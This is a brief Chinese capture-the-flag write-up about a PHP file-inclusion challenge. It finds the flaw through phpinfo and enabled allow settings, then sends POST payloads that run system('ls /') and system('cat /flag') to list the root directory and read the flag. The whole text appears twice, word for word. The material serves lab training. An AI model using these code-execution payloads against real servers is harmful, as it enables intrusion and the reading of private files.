开启题目
点击下面的 phpinfo 跳转之后发现查看到了 PHP版本,根据源码可以感觉到这里有文件包含,查看之后发现 allow 的配置都开着
抓包之后把 GET 换成 POST,构造 payload 发包,发现根目录有一个 flag 文件
<?php system('ls /');?>
使用 cat 命令查看 flag 文件发现了 flag
<?php system('cat /flag');?>
开启题目
点击下面的 phpinfo 跳转之后发现查看到了 PHP版本,根据源码可以感觉到这里有文件包含,查看之后发现 allow 的配置都开着
抓包之后把 GET 换成 POST,构造 payload 发包,发现根目录有一个 flag 文件
<?php system('ls /');?>
使用 cat 命令查看 flag 文件发现了 flag
<?php system('cat /flag');?>